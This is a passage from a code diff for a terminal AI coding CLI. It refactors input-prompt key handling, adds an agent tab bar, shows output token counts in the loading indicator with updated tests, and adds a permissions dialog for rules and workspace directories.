'./BaseTextInput.js'; +import type { RenderLineOptions } from './BaseTextInput.js'; /** * Represents an attachment (e.g., pasted image) displayed above the input prompt @@ -78,30 +83,8 @@ export interface InputPromptProps { isEmbeddedShellFocused?: boolean; } -// The input content, input container, and input suggestions list may have different widths -export const calculatePromptWidths = (terminalWidth: number) => { - const widthFraction = 0.9; - const FRAME_PADDING_AND_BORDER = 4; // Border (2) + padding (2) - const PROMPT_PREFIX_WIDTH = 2; // '> ' or '! ' - const MIN_CONTENT_WIDTH = 2; - - const innerContentWidth = - Math.floor(terminalWidth * widthFraction) - - FRAME_PADDING_AND_BORDER - - PROMPT_PREFIX_WIDTH; - - const inputWidth = Math.max(MIN_CONTENT_WIDTH, innerContentWidth); - const FRAME_OVERHEAD = FRAME_PADDING_AND_BORDER + PROMPT_PREFIX_WIDTH; - const containerWidth = inputWidth + FRAME_OVERHEAD; - const suggestionsWidth = Math.max(20, Math.floor(terminalWidth * 1.0)); - - return { - inputWidth, - containerWidth, - suggestionsWidth, - frameOverhead: FRAME_OVERHEAD, - } as const; -}; +// Re-export from shared utils for backwards compatibility +export { calculatePromptWidths } from '../utils/layoutUtils.js'; // Large paste placeholder thresholds const LARGE_PASTE_CHAR_THRESHOLD = 1000; @@ -132,6 +115,9 @@ export const InputPrompt: React.FC = ({ const uiState = useUIState(); const uiActions = useUIActions(); const { pasteWorkaround } = useKeypressContext(); + const { agents, agentTabBarFocused } = useAgentViewState(); + const { setAgentTabBarFocused } = useAgentViewActions(); + const hasAgents = agents.size > 0; const [justNavigatedHistory, setJustNavigatedHistory] = useState(false); const [escPressCount, setEscPressCount] = useState(0); const [showEscapePrompt, setShowEscapePrompt] = useState(false); @@ -213,9 +199,14 @@ export const InputPrompt: React.FC = ({ reverseSearchActive, ); + const commandSearchHistory = useMemo( + () => 
[...userMessages].reverse(), + [userMessages], + ); + const commandSearchCompletion = useReverseSearchCompletion( buffer, - userMessages, + commandSearchHistory, commandSearchActive, ); @@ -225,7 +216,8 @@ export const InputPrompt: React.FC = ({ const resetCommandSearchCompletionState = commandSearchCompletion.resetCompletionState; - const showCursor = focus && isShellFocused && !isEmbeddedShellFocused; + const showCursor = + focus && isShellFocused && !isEmbeddedShellFocused && !agentTabBarFocused; const resetEscapeState = useCallback(() => { if (escapeTimerRef.current) { @@ -351,6 +343,17 @@ export const InputPrompt: React.FC = ({ onChange: customSetTextAndResetCompletionSignal, }); + // When an arena session starts (agents appear), reset history position so + // that pressing down-arrow immediately focuses the agent tab bar instead + // of cycling through input history. + const prevHasAgentsRef = useRef(hasAgents); + useEffect(() => { + if (hasAgents && !prevHasAgentsRef.current) { + inputHistory.resetHistoryNav(); + } + prevHasAgentsRef.current = hasAgents; + }, [hasAgents, inputHistory]); + // Effect to reset completion if history navigation just occurred and set the text useEffect(() => { if (justNavigatedHistory) { @@ -411,13 +414,30 @@ export const InputPrompt: React.FC = ({ }, []); const handleInput = useCallback( - (key: Key) => { + (key: Key): boolean => { + // When the tab bar has focus, block all non-printable keys so arrow + // keys and shortcuts don't interfere. Printable characters fall + // through to BaseTextInput's default handler so the first keystroke + // appears in the input immediately (the tab bar handler releases + // focus on the same event). + if (agentTabBarFocused) { + if ( + key.sequence && + key.sequence.length === 1 && + !key.ctrl && + !key.meta + ) { + return false; // let BaseTextInput type the character + } + return true; // consume non-printable keys + } + // TODO(jacobr): this special case is likely not needed anymore. 
// We should probably stop supporting paste if the InputPrompt is not // focused. /// We want to handle paste even when not focused to support drag and drop. if (!focus && !key.paste) { - return; + return true; } if (key.paste) { @@ -459,18 +479,18 @@ export const InputPrompt: React.FC = ({ // Normal paste handling for small content buffer.handleInput(key); } - return; + return true; } if (vimHandleInput && vimHandleInput(key)) { - return; + return true; } // Handle feedback dialog keyboard interactions when dialog is open if (uiState.isFeedbackDialogOpen) { // If it's one of the feedback option keys (1-4), let FeedbackDialog handle it if ((FEEDBACK_DIALOG_KEYS as readonly string[]).includes(key.name)) { - return; + return true; } else { // For any other key, close feedback dialog temporarily and continue with normal processing uiActions.temporaryCloseFeedbackDialog(); @@ -496,7 +516,7 @@ export const InputPrompt: React.FC = ({ } setShellModeActive(!shellModeActive); buffer.setText(''); // Clear the '!' from input - return; + return true; } // Toggle keyboard shortcuts display with "?" 
when buffer is empty @@ -507,7 +527,7 @@ export const InputPrompt: React.FC = ({ onToggleShortcuts ) { onToggleShortcuts(); - return; + return true; } // Hide shortcuts on any other key press @@ -537,33 +557,33 @@ export const InputPrompt: React.FC = ({ setReverseSearchActive, reverseSearchCompletion.resetCompletionState, ); - return; + return true; } if (commandSearchActive) { cancelSearch( setCommandSearchActive, commandSearchCompletion.resetCompletionState, ); - return; + return true; } if (shellModeActive) { setShellModeActive(false); resetEscapeState(); - return; + return true; } if (completion.showSuggestions) { completion.resetCompletionState(); setExpandedSuggestionIndex(-1); resetEscapeState(); - return; + return true; } // Handle double ESC for clearing input if (escPressCount === 0) { if (buffer.text === '') { - return; + return true; } setEscPressCount(1); setShowEscapePrompt(true); @@ -579,7 +599,7 @@ export const InputPrompt: React.FC = ({ resetCompletionState(); resetEscapeState(); } - return; + return true; } // Ctrl+Y: Retry the last failed request. @@ -589,19 +609,19 @@ export const InputPrompt: React.FC = ({ // If no failed request exists, a message will be shown to the user. 
if (keyMatchers[Command.RETRY_LAST](key)) { uiActions.handleRetryLastPrompt(); - return; + return true; } if (shellModeActive && keyMatchers[Command.REVERSE_SEARCH](key)) { setReverseSearchActive(true); setTextBeforeReverseSearch(buffer.text); setCursorPosition(buffer.cursor); - return; + return true; } if (keyMatchers[Command.CLEAR_SCREEN](key)) { onClearScreen(); - return; + return true; } if (reverseSearchActive || commandSearchActive) { @@ -626,29 +646,29 @@ export const InputPrompt: React.FC = ({ if (showSuggestions) { if (keyMatchers[Command.NAVIGATION_UP](key)) { navigateUp(); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { navigateDown(); - return; + return true; } if (keyMatchers[Command.COLLAPSE_SUGGESTION](key)) { if (suggestions[activeSuggestionIndex].value.length >= MAX_WIDTH) { setExpandedSuggestionIndex(-1); - return; + return true; } } if (keyMatchers[Command.EXPAND_SUGGESTION](key)) { if (suggestions[activeSuggestionIndex].value.length >= MAX_WIDTH) { setExpandedSuggestionIndex(activeSuggestionIndex); - return; + return true; } } if (keyMatchers[Command.ACCEPT_SUGGESTION_REVERSE_SEARCH](key)) { sc.handleAutocomplete(activeSuggestionIndex); resetState(); setActive(false); - return; + return true; } } @@ -660,7 +680,7 @@ export const InputPrompt: React.FC = ({ handleSubmitAndClear(textToSubmit); resetState(); setActive(false); - return; + return true; } // Prevent up/down from falling through to regular history navigation @@ -668,14 +688,14 @@ export const InputPrompt: React.FC = ({ keyMatchers[Command.NAVIGATION_UP](key) || keyMatchers[Command.NAVIGATION_DOWN](key) ) { - return; + return true; } } // If the command is a perfect match, pressing enter should execute it. 
if (completion.isPerfectMatch && keyMatchers[Command.RETURN](key)) { handleSubmitAndClear(buffer.text); - return; + return true; } if (completion.showSuggestions) { @@ -683,12 +703,12 @@ export const InputPrompt: React.FC = ({ if (keyMatchers[Command.COMPLETION_UP](key)) { completion.navigateUp(); setExpandedSuggestionIndex(-1); // Reset expansion when navigating - return; + return true; } if (keyMatchers[Command.COMPLETION_DOWN](key)) { completion.navigateDown(); setExpandedSuggestionIndex(-1); // Reset expansion when navigating - return; + return true; } } @@ -703,7 +723,7 @@ export const InputPrompt: React.FC = ({ setExpandedSuggestionIndex(-1); // Reset expansion after selection } } - return; + return true; } } @@ -711,28 +731,28 @@ export const InputPrompt: React.FC = ({ if (isAttachmentMode && attachments.length > 0) { if (key.name === 'left') { setSelectedAttachmentIndex((i) => Math.max(0, i - 1)); - return; + return true; } if (key.name === 'right') { setSelectedAttachmentIndex((i) => Math.min(attachments.length - 1, i + 1), ); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { // Exit attachment mode and return to input setIsAttachmentMode(false); setSelectedAttachmentIndex(-1); - return; + return true; } if (key.name === 'backspace' || key.name === 'delete') { handleAttachmentDelete(selectedAttachmentIndex); - return; + return true; } if (key.name === 'return' || key.name === 'escape') { setIsAttachmentMode(false); setSelectedAttachmentIndex(-1); - return; + return true; } // For other keys, exit attachment mode and let input handle them setIsAttachmentMode(false); @@ -753,7 +773,7 @@ export const InputPrompt: React.FC = ({ ) { setIsAttachmentMode(true); setSelectedAttachmentIndex(attachments.length - 1); - return; + return true; } if (!shellModeActive) { @@ -761,16 +781,16 @@ export const InputPrompt: React.FC = ({ setCommandSearchActive(true); setTextBeforeReverseSearch(buffer.text); setCursorPosition(buffer.cursor); - return; + 
return true; } if (keyMatchers[Command.HISTORY_UP](key)) { inputHistory.navigateUp(); - return; + return true; } if (keyMatchers[Command.HISTORY_DOWN](key)) { inputHistory.navigateDown(); - return; + return true; } // Handle arrow-up/down for history on single-line or at edges if ( @@ -779,27 +799,33 @@ export const InputPrompt: React.FC = ({ (buffer.visualCursor[0] === 0 && buffer.visualScrollRow === 0)) ) { inputHistory.navigateUp(); - return; + return true; } if ( keyMatchers[Command.NAVIGATION_DOWN](key) && (buffer.allVisualLines.length === 1 || buffer.visualCursor[0] === buffer.allVisualLines.length - 1) ) { - inputHistory.navigateDown(); - return; + if (inputHistory.navigateDown()) { + return true; + } + if (hasAgents) { + setAgentTabBarFocused(true); + return true; + } + return true; } } else { // Shell History Navigation if (keyMatchers[Command.NAVIGATION_UP](key)) { const prevCommand = shellHistory.getPreviousCommand(); if (prevCommand !== null) buffer.setText(prevCommand); - return; + return true; } if (keyMatchers[Command.NAVIGATION_DOWN](key)) { const nextCommand = shellHistory.getNextCommand(); if (nextCommand !== null) buffer.setText(nextCommand); - return; + return true; } } @@ -810,7 +836,7 @@ export const InputPrompt: React.FC = ({ // paste markers may not work reliably and Enter key events can leak from pasted text. 
if (pasteWorkaround && recentPasteTime !== null) { // Paste occurred recently, ignore this submit to prevent auto-execution - return; + return true; } const [row, col] = buffer.cursor; @@ -823,65 +849,21 @@ export const InputPrompt: React.FC = ({ handleSubmitAndClear(buffer.text); } } - return; - } - - // Newline insertion - if (keyMatchers[Command.NEWLINE](key)) { - buffer.newline(); - return; - } - - // Ctrl+A (Home) / Ctrl+E (End) - if (keyMatchers[Command.HOME](key)) { - buffer.move('home'); - return; - } - if (keyMatchers[Command.END](key)) { - buffer.move('end'); - return; - } - // Ctrl+C (Clear input) - if (keyMatchers[Command.CLEAR_INPUT](key)) { - if (buffer.text.length > 0) { - buffer.setText(''); - resetCompletionState(); - } - return; - } - - // Kill line commands - if (keyMatchers[Command.KILL_LINE_RIGHT](key)) { - buffer.killLineRight(); - return; - } - if (keyMatchers[Command.KILL_LINE_LEFT](key)) { - buffer.killLineLeft(); - return; - } - - if (keyMatchers[Command.DELETE_WORD_BACKWARD](key)) { - buffer.deleteWordLeft(); - return; - } - - // External editor - if (keyMatchers[Command.OPEN_EXTERNAL_EDITOR](key)) { - buffer.openInExternalEditor(); - return; + return true; } // Ctrl+V for clipboard image paste if (keyMatchers[Command.PASTE_CLIPBOARD_IMAGE](key)) { handleClipboardImage(); - return; + return true; } // Handle backspace with placeholder-aware deletion if ( - key.name === 'backspace' || - key.sequence === '\x7f' || - (key.ctrl && key.name === 'h') + pendingPastes.size > 0 && + (key.name === 'backspace' || + key.sequence === '\x7f' || + (key.ctrl && key.name === 'h')) ) { const text = buffer.text; const [row, col] = buffer.cursor; @@ -894,7 +876,6 @@ export const InputPrompt: React.FC = ({ offset += col; // Check if we're at the end of any placeholder - let placeholderDeleted = false; for (const placeholder of pendingPastes.keys()) { const placeholderStart = offset - placeholder.length; if ( @@ -913,20 +894,22 @@ export const InputPrompt: 
React.FC = ({ if (parsed) { freePlaceholderId(parsed.charCount, parsed.id); } - placeholderDeleted = true; - break; + return true; } } - - if (!placeholderDeleted) { - // Normal backspace behavior - buffer.backspace(); - } - return; + // No placeholder matched — fall through to BaseTextInput's default backspace } - // Fall back to the text buffer's default input handling for all other keys - buffer.handleInput(key); + // Ctrl+C with completion active — also reset completion state + if (keyMatchers[Command.CLEAR_INPUT](key)) { + if (buffer.text.length > 0) { + resetCompletionState(); + } + // Fall through to BaseTextInput's default CLEAR_INPUT handler + } + + // All remaining keys (readline shortcuts, text input) handled by BaseTextInput + return false; }, [ focus, @@ -964,15 +947,89 @@ export const InputPrompt: React.FC = ({ pendingPastes, parsePlaceholder, freePlaceholderId, + agentTabBarFocused, + hasAgents, + setAgentTabBarFocused, ], ); - useKeypress(handleInput, { isActive: !isEmbeddedShellFocused }); + const renderLineWithHighlighting = useCallback( + (opts: RenderLineOptions): React.ReactNode => { + const { + lineText, + isOnCursorLine, + cursorCol: cursorVisualColAbsolute, + showCursor: showCursorOpt, + absoluteVisualIndex, + buffer: buf, + } = opts; + const mapEntry = buf.visualToLogicalMap[absoluteVisualIndex]; + const [logicalLineIdx, logicalStartCol] = mapEntry; + const logicalLine = buf.lines[logicalLineIdx] || ''; + const tokens = parseInputForHighlighting(logicalLine, logicalLineIdx); - const linesToRender = buffer.viewportVisualLines; - const [cursorVisualRowAbsolute, cursorVisualColAbsolute] = - buffer.visualCursor; - const scrollVisualRow = buffer.visualScrollRow; + const visualStart = logicalStartCol; + const visualEnd = logicalStartCol + cpLen(lineText); + const segments = buildSegmentsForVisualSlice( + tokens, + visualStart, + visualEnd, + ); + + const renderedLine: React.ReactNode[] = []; + let charCount = 0; + segments.forEach((seg, segIdx) 
=> { + const segLen = cpLen(seg.text); + let display = seg.text; + + if (isOnCursorLine) { + const segStart = charCount; + const segEnd = segStart + segLen; + if ( + cursorVisualColAbsolute >= segStart && + cursorVisualColAbsolute < segEnd + ) { + const charToHighlight = cpSlice( + seg.text, + cursorVisualColAbsolute - segStart, + cursorVisualColAbsolute - segStart + 1, + ); + const highlighted = showCursorOpt + ? chalk.inverse(charToHighlight) + : charToHighlight; + display = + cpSlice(seg.text, 0, cursorVisualColAbsolute - segStart) + + highlighted + + cpSlice(seg.text, cursorVisualColAbsolute - segStart + 1); + } + charCount = segEnd; + } + + const color = + seg.type === 'command' || seg.type === 'file' + ? theme.text.accent + : theme.text.primary; + + renderedLine.push( + + {display} + , + ); + }); + + if (isOnCursorLine && cursorVisualColAbsolute === cpLen(lineText)) { + // Add zero-width space after cursor to prevent Ink from trimming trailing whitespace + renderedLine.push( + + {showCursorOpt ? chalk.inverse(' ') + '\u200B' : ' \u200B'} + , + ); + } + + return {renderedLine}; + }, + [], + ); const getActiveCompletion = () => { if (commandSearchActive) return commandSearchCompletion; @@ -1009,10 +1066,33 @@ export const InputPrompt: React.FC = ({ } const borderColor = - isShellFocused && !isEmbeddedShellFocused + isShellFocused && !isEmbeddedShellFocused && !agentTabBarFocused ? (statusColor ?? theme.border.focused) : theme.border.default; + const prefixNode = ( + + {shellModeActive ? ( + reverseSearchActive ? ( + + (r:){' '} + + ) : ( + '!' + ) + ) : commandSearchActive ? ( + (r:) + ) : showYoloStyling ? ( + '*' + ) : ( + '>' + )}{' '} + + ); + return ( <> {attachments.length > 0 && ( @@ -1032,142 +1112,17 @@ export const InputPrompt: React.FC = ({ ))} )} - - - {shellModeActive ? ( - reverseSearchActive ? ( - - (r:){' '} - - ) : ( - '!' - ) - ) : commandSearchActive ? ( - (r:) - ) : showYoloStyling ? 
( - '*' - ) : ( - '>' - )}{' '} - - - {buffer.text.length === 0 && placeholder ? ( - showCursor ? ( - - {chalk.inverse(placeholder.slice(0, 1))} - {placeholder.slice(1)} - - ) : ( - {placeholder} - ) - ) : ( - linesToRender.map((lineText, visualIdxInRenderedSet) => { - const absoluteVisualIdx = - scrollVisualRow + visualIdxInRenderedSet; - const mapEntry = buffer.visualToLogicalMap[absoluteVisualIdx]; - const cursorVisualRow = cursorVisualRowAbsolute - scrollVisualRow; - const isOnCursorLine = - focus && visualIdxInRenderedSet === cursorVisualRow; - - const renderedLine: React.ReactNode[] = []; - - const [logicalLineIdx, logicalStartCol] = mapEntry; - const logicalLine = buffer.lines[logicalLineIdx] || ''; - const tokens = parseInputForHighlighting( - logicalLine, - logicalLineIdx, - ); - - const visualStart = logicalStartCol; - const visualEnd = logicalStartCol + cpLen(lineText); - const segments = buildSegmentsForVisualSlice( - tokens, - visualStart, - visualEnd, - ); - - let charCount = 0; - segments.forEach((seg, segIdx) => { - const segLen = cpLen(seg.text); - let display = seg.text; - - if (isOnCursorLine) { - const relativeVisualColForHighlight = cursorVisualColAbsolute; - const segStart = charCount; - const segEnd = segStart + segLen; - if ( - relativeVisualColForHighlight >= segStart && - relativeVisualColForHighlight < segEnd - ) { - const charToHighlight = cpSlice( - seg.text, - relativeVisualColForHighlight - segStart, - relativeVisualColForHighlight - segStart + 1, - ); - const highlighted = showCursor - ? chalk.inverse(charToHighlight) - : charToHighlight; - display = - cpSlice( - seg.text, - 0, - relativeVisualColForHighlight - segStart, - ) + - highlighted + - cpSlice( - seg.text, - relativeVisualColForHighlight - segStart + 1, - ); - } - charCount = segEnd; - } - - const color = - seg.type === 'command' || seg.type === 'file' - ? 
theme.text.accent - : theme.text.primary; - - renderedLine.push( - - {display} - , - ); - }); - - if ( - isOnCursorLine && - cursorVisualColAbsolute === cpLen(lineText) - ) { - // Add zero-width space after cursor to prevent Ink from trimming trailing whitespace - renderedLine.push( - - {showCursor ? chalk.inverse(' ') + '\u200B' : ' \u200B'} - , - ); - } - - return ( - - {renderedLine} - - ); - }) - )} - - + isActive={!isEmbeddedShellFocused} + renderLine={renderLineWithHighlighting} + /> {shouldShowSuggestions && ( ', () => { const output = lastFrame(); expect(output).toContain('MockRespondingSpinner'); expect(output).toContain('Loading...'); - expect(output).toContain('(esc to cancel, 5s)'); + expect(output).toContain('5s'); + expect(output).toContain('esc to cancel'); }); it('should render spinner (static), phrase but no time/cancel when streamingState is WaitingForConfirmation', () => { @@ -88,7 +89,7 @@ describe('', () => { expect(output).toContain('⠏'); // Static char for WaitingForConfirmation expect(output).toContain('Confirm action'); expect(output).not.toContain('(esc to cancel)'); - expect(output).not.toContain(', 10s'); + expect(output).not.toContain('10s'); }); it('should display the currentLoadingPhrase correctly', () => { @@ -112,7 +113,7 @@ describe('', () => { , StreamingState.Responding, ); - expect(lastFrame()).toContain('(esc to cancel, 1m)'); + expect(lastFrame()).toContain('(1m · esc to cancel)'); }); it('should display the elapsedTime correctly in human-readable format', () => { @@ -124,7 +125,7 @@ describe('', () => { , StreamingState.Responding, ); - expect(lastFrame()).toContain('(esc to cancel, 2m 5s)'); + expect(lastFrame()).toContain('(2m 5s · esc to cancel)'); }); it('should render rightContent when provided', () => { @@ -155,7 +156,7 @@ describe('', () => { let output = lastFrame(); expect(output).toContain('MockRespondingSpinner'); expect(output).toContain('Now Responding'); - expect(output).toContain('(esc to cancel, 2s)'); + 
expect(output).toContain('(2s · esc to cancel)'); // Transition to WaitingForConfirmation rerender( @@ -170,7 +171,7 @@ describe('', () => { expect(output).toContain('⠏'); expect(output).toContain('Please Confirm'); expect(output).not.toContain('(esc to cancel)'); - expect(output).not.toContain(', 15s'); + expect(output).not.toContain('15s'); // Transition back to Idle rerender( @@ -262,7 +263,7 @@ describe('', () => { // Check for single line output expect(output?.includes('\n')).toBe(false); expect(output).toContain('Loading...'); - expect(output).toContain('(esc to cancel, 5s)'); + expect(output).toContain('(5s · esc to cancel)'); expect(output).toContain('Right'); }); @@ -284,8 +285,8 @@ describe('', () => { expect(lines).toHaveLength(3); if (lines) { expect(lines[0]).toContain('Loading...'); - expect(lines[0]).not.toContain('(esc to cancel, 5s)'); - expect(lines[1]).toContain('(esc to cancel, 5s)'); + expect(lines[0]).not.toContain('5s'); + expect(lines[1]).toContain('5s'); expect(lines[2]).toContain('Right'); } }); @@ -308,4 +309,70 @@ describe('', () => { expect(lastFrame()?.includes('\n')).toBe(true); }); }); + + describe('token display', () => { + it('should display output tokens inline with arrow notation', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + expect(output).toContain('↓ 847 tokens'); + expect(output).not.toContain('↑'); + expect(output).toContain('5s'); + expect(output).toContain('esc to cancel'); + }); + + it('should not display tokens when output tokens is 0', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + }); + + it('should not display tokens when props are undefined', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + ); + const output = lastFrame(); + 
expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + }); + + it('should hide tokens in narrow terminal', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 79, + ); + const output = lastFrame(); + expect(output).not.toContain('↓'); + expect(output).not.toContain('tokens'); + expect(output).toContain('esc to cancel'); + }); + + it('should show tokens in wide terminal with inline format', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 80, + ); + const output = lastFrame(); + expect(output).toContain('↓ 5.4k tokens'); + }); + + it('should format tokens inline with time and cancel', () => { + const { lastFrame } = renderWithContext( + , + StreamingState.Responding, + 120, + ); + const output = lastFrame(); + expect(output).toContain('(5s · ↓ 5.4k tokens · esc to cancel)'); + }); + }); }); diff --git a/packages/cli/src/ui/components/LoadingIndicator.tsx b/packages/cli/src/ui/components/LoadingIndicator.tsx index 5fc2c20b4..7b6f2f06f 100644 --- a/packages/cli/src/ui/components/LoadingIndicator.tsx +++ b/packages/cli/src/ui/components/LoadingIndicator.tsx @@ -11,7 +11,7 @@ import { theme } from '../semantic-colors.js'; import { useStreamingContext } from '../contexts/StreamingContext.js'; import { StreamingState } from '../types.js'; import { GeminiRespondingSpinner } from './GeminiRespondingSpinner.js'; -import { formatDuration } from '../utils/formatters.js'; +import { formatDuration, formatTokenCount } from '../utils/formatters.js'; import { useTerminalSize } from '../hooks/useTerminalSize.js'; import { isNarrowWidth } from '../utils/isNarrowWidth.js'; import { t } from '../../i18n/index.js'; @@ -21,6 +21,7 @@ interface LoadingIndicatorProps { elapsedTime: number; rightContent?: React.ReactNode; thought?: ThoughtSummary | null; + candidatesTokens?: number; } export const LoadingIndicator: React.FC = ({ @@ -28,6 +29,7 @@ export const LoadingIndicator: React.FC = ({ 
elapsedTime, rightContent, thought, + candidatesTokens, }) => { const streamingState = useStreamingContext(); const { columns: terminalWidth } = useTerminalSize(); @@ -39,18 +41,26 @@ export const LoadingIndicator: React.FC = ({ const primaryText = thought?.subject || currentLoadingPhrase; + const outputTokens = candidatesTokens ?? 0; + const showTokens = !isNarrow && outputTokens > 0; + + const timeStr = + elapsedTime < 60 ? `${elapsedTime}s` : formatDuration(elapsedTime * 1000); + + const tokenStr = showTokens + ? ` · ↓ ${formatTokenCount(outputTokens)} tokens` + : ''; + const cancelAndTimerContent = streamingState !== StreamingState.WaitingForConfirmation - ? t('(esc to cancel, {{time}})', { - time: - elapsedTime < 60 - ? `${elapsedTime}s` - : formatDuration(elapsedTime * 1000), + ? t('({{time}}{{tokens}} · esc to cancel)', { + time: timeStr, + tokens: tokenStr, }) : null; return ( - + {/* Main loading line */} void; +} + +// --------------------------------------------------------------------------- +// Main component +// --------------------------------------------------------------------------- + +export function PermissionsDialog({ + onExit, +}: PermissionsDialogProps): React.JSX.Element { + const config = useConfig(); + const settings = useSettings(); + const pm = config.getPermissionManager?.() as PermissionManager | null; + + // --- Tab state --- + const tabs = useMemo(() => getTabs(), []); + const [activeTabIndex, setActiveTabIndex] = useState(0); + const activeTab = tabs[activeTabIndex]!; + + // --- Rule list state --- + const [allRules, setAllRules] = useState([]); + const [searchQuery, setSearchQuery] = useState(''); + const [isSearchActive, setIsSearchActive] = useState(false); + + // --- Dialog view state machine --- + const [view, setView] = useState('rule-list'); + const [newRuleInput, setNewRuleInput] = useState(''); + const [pendingRuleText, setPendingRuleText] = useState(''); + const [deleteTarget, setDeleteTarget] = useState(null); + + // --- 
Workspace directory state --- + const workspaceContext = config.getWorkspaceContext(); + const [newDirInput, setNewDirInput] = useState(''); + const [dirInputError, setDirInputError] = useState(''); + const [dirInputRemountKey, setDirInputRemountKey] = useState(0); + const [completionIndex, setCompletionIndex] = useState(0); + const [removeDirTarget, setRemoveDirTarget] = useState(null); + const [dirRefreshKey, setDirRefreshKey] = useState(0); + + // Refresh rules from PermissionManager + const refreshRules = useCallback(() => { + if (pm) { + setAllRules(pm.listRules()); + } + }, [pm]); + + useEffect(() => { + refreshRules(); + }, [refreshRules]); + + // --- Workspace directory helpers --- + const directories = useMemo(() => { + // eslint-disable-next-line @typescript-eslint/no-unused-expressions + dirRefreshKey; // dependency to trigger re-computation + return workspaceContext.getDirectories(); + }, [workspaceContext, dirRefreshKey]); + + const initialDirs = useMemo( + () => new Set(workspaceContext.getInitialDirectories()), + [workspaceContext], + ); + + // Filesystem completions based on current input + const dirCompletions = useMemo(() => { + const trimmed = newDirInput.trim(); + if (!trimmed) return []; + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const endsWithSep = + expanded.endsWith('/') || expanded.endsWith(nodePath.sep); + const searchDir = endsWithSep ? expanded : nodePath.dirname(expanded); + const prefix = endsWithSep ? 
'' : nodePath.basename(expanded); + try { + return fs + .readdirSync(searchDir, { withFileTypes: true }) + .filter( + (e) => + e.isDirectory() && + e.name.startsWith(prefix) && + !e.name.startsWith('.'), + ) + .map((e) => nodePath.join(searchDir, e.name)) + .slice(0, 6); + } catch { + return []; + } + }, [newDirInput]); + + const handleDirInputChange = useCallback( + (text: string) => { + setNewDirInput(text); + if (dirInputError) setDirInputError(''); + }, + [dirInputError], + ); + + // Reset selection to first item whenever the completions list changes + useEffect(() => { + setCompletionIndex(0); + }, [dirCompletions]); + + const handleDirTabComplete = useCallback(() => { + const selected = dirCompletions[completionIndex] ?? dirCompletions[0]; + if (selected) { + setNewDirInput(selected + '/'); + setDirInputRemountKey((k) => k + 1); + } + }, [dirCompletions, completionIndex]); + + const handleDirCompletionUp = useCallback(() => { + if (dirCompletions.length === 0) return; + setCompletionIndex( + (prev) => (prev - 1 + dirCompletions.length) % dirCompletions.length, + ); + }, [dirCompletions.length]); + + const handleDirCompletionDown = useCallback(() => { + if (dirCompletions.length === 0) return; + setCompletionIndex((prev) => (prev + 1) % dirCompletions.length); + }, [dirCompletions.length]); + + const dirListItems = useMemo(() => { + const items: Array<{ + label: string; + value: string; + key: string; + }> = []; + // 'Add directory…' always FIRST + items.push({ + label: t('Add directory…'), + value: '__add_dir__', + key: '__add_dir__', + }); + // Only show non-initial (runtime-added) directories in the selectable list + for (const dir of directories) { + if (!initialDirs.has(dir)) { + items.push({ + label: dir, + value: dir, + key: `dir-${dir}`, + }); + } + } + return items; + }, [directories, initialDirs]); + + const handleDirListSelect = useCallback( + (value: string) => { + if (value === '__add_dir__') { + setNewDirInput(''); + setView('ws-add-dir-input'); 
+ return; + } + // Selecting a directory → offer to remove if not initial + if (!initialDirs.has(value)) { + setRemoveDirTarget(value); + setView('ws-remove-confirm'); + } + }, + [initialDirs], + ); + + const handleAddDirSubmit = useCallback(() => { + const trimmed = newDirInput.trim(); + if (!trimmed) return; + + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const absoluteExpanded = nodePath.isAbsolute(expanded) + ? expanded + : nodePath.resolve(expanded); + + // Existence & type checks + if (!fs.existsSync(absoluteExpanded)) { + setDirInputError(t('Directory does not exist.')); + return; + } + if (!fs.statSync(absoluteExpanded).isDirectory()) { + setDirInputError(t('Path is not a directory.')); + return; + } + + // Resolve real path to match what workspaceContext stores + let resolved: string; + try { + resolved = fs.realpathSync(absoluteExpanded); + } catch { + resolved = absoluteExpanded; + } + + // Validate: exact duplicate + if ((directories as string[]).includes(resolved)) { + setDirInputError(t('This directory is already in the workspace.')); + return; + } + + // Validate: is a subdirectory of an existing workspace directory + for (const existingDir of directories) { + if (isPathWithinRoot(resolved, existingDir)) { + setDirInputError( + t('Already covered by existing directory: {{dir}}', { + dir: existingDir, + }), + ); + return; + } + } + + setDirInputError(''); + + // Add to workspace context (already validated) + workspaceContext.addDirectory(resolved); + + // Persist directly to project (Workspace) settings + const key = 'context.includeDirectories'; + const currentDirs = (settings.merged as Record)[ + 'context' + ] as Record | undefined; + const existingDirs = currentDirs?.['includeDirectories'] ?? 
[]; + if (!existingDirs.includes(resolved)) { + settings.setValue(SettingScope.Workspace, key, [ + ...existingDirs, + resolved, + ]); + } + + setDirRefreshKey((k) => k + 1); + setView('ws-dir-list'); + setNewDirInput(''); + }, [newDirInput, directories, workspaceContext, settings]); + + const handleRemoveDirConfirm = useCallback(() => { + if (!removeDirTarget) return; + + // Remove from workspace context + workspaceContext.removeDirectory(removeDirTarget); + + // Remove from settings (try both scopes) + for (const scope of [SettingScope.User, SettingScope.Workspace]) { + const scopeSettings = settings.forScope(scope).settings; + const contextSection = (scopeSettings as Record)[ + 'context' + ] as Record | undefined; + const scopeDirs = contextSection?.['includeDirectories']; + if (scopeDirs?.includes(removeDirTarget)) { + const updated = scopeDirs.filter((d: string) => d !== removeDirTarget); + settings.setValue(scope, 'context.includeDirectories', updated); + break; + } + } + + setDirRefreshKey((k) => k + 1); + setRemoveDirTarget(null); + setView('ws-dir-list'); + }, [removeDirTarget, workspaceContext, settings]); + + // Filter rules for current tab + const currentTabRules = useMemo(() => { + if (activeTab.id === 'workspace') return []; + return allRules.filter((r) => r.type === activeTab.id); + }, [allRules, activeTab.id]); + + // Search-filtered rules + const filteredRules = useMemo(() => { + if (!searchQuery.trim()) return currentTabRules; + const q = searchQuery.toLowerCase(); + return currentTabRules.filter( + (r) => + r.rule.raw.toLowerCase().includes(q) || + r.rule.toolName.toLowerCase().includes(q), + ); + }, [currentTabRules, searchQuery]); + + // Build radio items: 